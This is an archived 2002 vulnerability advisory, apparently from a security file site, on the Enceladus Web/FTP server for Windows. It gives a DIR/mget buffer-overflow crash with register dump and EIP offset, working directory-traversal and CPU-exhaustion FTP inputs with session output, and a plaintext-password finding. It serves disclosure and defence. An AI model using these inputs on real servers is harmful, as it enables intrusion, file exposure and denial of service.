exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

enceladus-3.9.11.txt

enceladus-3.9.11.txt
Posted Dec 21, 2002

The Enceladus Web and FTP server suite for Windows below v3.9.11 contains a buffer overflow which allows remote command execution. More information available http://www.mollensoft.com.

tags | advisory, remote, web, overflow
systems | windows
SHA-256 | bc56ff8f7fcff42ba61b72dc3e45978976994ff033fe3cee6516d6863ba75f6e

enceladus-3.9.11.txt

Change Mirror Download
hi
Enceladus Server Suite is an Internet/Intranet lightweight
Web and
FTP Server for
Windows, the version 3.9.11 according to
mollensoft "Includes a fix to
the directory traversal vulnerability... ( This is a
CRITICAL
SECURITY UPDATE)"
http://www.mollensoft.com/
I found several vulnerability critical concerning this
server
1-buffer overflow and remote code execution:
tamer notified that the waiter crashait with "long sequence
of
characters as an argument to "CD" command"
(http://online.securityfocus.com/archive/1/302596)..I
believe that
it passed dimensioned of a true buffer overflow because
this crash
allows only a overwrite ' ESP and thusune simple attaque DOS
50e091e3 803820 cmp byte ptr [eax],0x20
(ftpservx.dll)
with argument "DIR" we can overwrite eip
dir+[buffer =279byte] >> eip is overwritet at:42,43,44,45
sufficient for the injection of a shellcode
the state of the registers is:

Access violation - code c0000005 (first chance)
eax=0012bcb8 ebx=0012c574 ecx=61616161 edx=7846f5b5
esi=0012bce0
edi=0019affd
eip=61616161 esp=0012bc20 ebp=0012bc40 iopl=0 nv up ei pl
zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00000246
61616161 ?? ???

it is noticed whereas the eip is at the beginning of our
buffer
ftp> dir aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
[EIP=4BYTE]
aaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaa
aaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaa
aaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

the argument "mget" gives also the same result
the exploit is simple of realization since ebx point
towards our
buffer
0012c274 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61

2- directory traversal


ftp>cd ..
access denied
ftp>cd cd @/....\
250 CWD command successful.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
drwxr-xr-x 1 User Group 0 Dec 18 12:59 anonymous-
ftp
drwxr-xr-x 1 User Group 0 Dec 18 12:59 downloads
-rwxr-xr-x 1 User Group 8544 Mar 18 02:09
emailme.html
-rwxr-xr-x 1 User Group 878 Mar 16 04:52
execupload.html
-rwxr-xr-x 1 User Group 1033 Oct 27 02:22
exitstatus.html
-rwxr-xr-x 1 User Group 5965 Mar 18 02:12
fileuplogin.html
drwxr-xr-x 1 User Group 0 Dec 18 12:59 ftproot
drwxr-xr-x 1 User Group 0 Dec 18 12:59 images
-rwxr-xr-x 1 User Group 6783 Mar 18 02:11 index.html
-rwxr-xr-x 1 User Group 4465 Mar 18 02:09 Links.html
-rwxr-xr-x 1 User Group 1299 Mar 18 23:41
mailexitstatus.html
-rwxr-xr-x 1 User Group 4402 Mar 18 02:09
MyPictures.html
drwxr-xr-x 1 User Group 0 Dec 18 12:59 secure-
downloads
-rwxr-xr-x 1 User Group 5082 Mar 18 02:09
signguestbook.html
-rwxr-xr-x 1 User Group 5188 Mar 18 02:09 upload.html
ftp> cd @@@@@@@@@@@/..c:\
250 CWD command successful.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
226 Listing complete.
ftp> pwd
257 "c:/" is current directory.
ftp> dir

[NO COMMENT]

3-denial of service and consume cpu
ftp> cd @/..@/..
(no reponse)
cpu 99% used

4-the password is stored plain text in /user/"login"

securma massine


_________________________________________________________
Gagne une PS2 ! Envoie un SMS avec le code PS au 61166
(0,35€ Hors coût du SMS)

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close